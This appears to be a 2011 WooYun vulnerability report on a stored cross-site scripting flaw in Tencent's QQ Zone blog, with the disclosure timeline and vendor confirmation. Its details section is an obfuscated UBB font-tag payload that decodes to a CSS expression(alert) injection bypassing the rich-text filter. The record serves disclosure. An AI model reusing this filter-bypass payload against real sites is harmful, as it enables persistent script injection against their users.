漏洞概要 关注数(10) 关注此漏洞
缺陷编号: WooYun-2011-01937
漏洞标题: QQ空间跨站
相关厂商: 腾讯
漏洞作者: s!lly3r
提交时间: 2011-04-19
公开时间: 2011-05-20
漏洞类型: xss跨站脚本攻击
危害等级: 中
自评Rank: 5
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org
Tags标签: 富文本策略绕过 持久型xss sns类型应用xss xss发生点上下文敏感
漏洞详情
披露状态:
2011-04-19: 细节已通知厂商并且等待厂商处理中
2011-04-20: 厂商已经确认,细节仅向厂商公开
2011-05-05: 细节已向核心白帽子及相关领域专家开放
2011-05-20: 细节向全体白帽子公开
2011-06-04: 细节向公众公开
简要描述:
XSS~`持久存储的
详细说明:
日志ubb代码
[ft=p,,A\002f\0026\0023\0033\0039\003b\003B\0026\0023\0031\0031\0039\003b\0026\0023\0031\0030\0035\003b\0026\0023\0031\0030\0030\003b\0026\0023\0031\0031\0036\003b\0026\0023\0031\0030\0034\003b\0026\0023\0035\0038\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0032\0030\003b\0026\0023\0031\0031\0032\003b\0026\0023\0031\0031\0034\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0030\0035\003b\0026\0023\0031\0031\0031\003b\0026\0023\0031\0031\0030\003b\0026\0023\0034\0030\003b\0026\0023\0039\0037\003b\0026\0023\0031\0030\0038\003b\0026\0023\0031\0030\0031\003b\0026\0023\0031\0031\0034\003b\0026\0023\0031\0031\0036\003b\0026\0023\0034\0030\003b\0026\0023\0034\0037\003b\0026\0023\0031\0032\0030\003b\0026\0023\0031\0031\0035\003b\0026\0023\0031\0031\0035\003b\0026\0023\0034\0037\003b\0026\0023\0034\0031\003b\0026\0023\0034\0031\003b\0026\0023\0035\0039\003b\0026\0023\0034\0037\003b\0026\0023\0034\0032\003b]xd[/ft]漏洞证明:
修复方案:
^_^
版权声明:转载请注明来源 s!lly3r@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2011-04-20
厂商回复:
thx
最新状态:
暂无
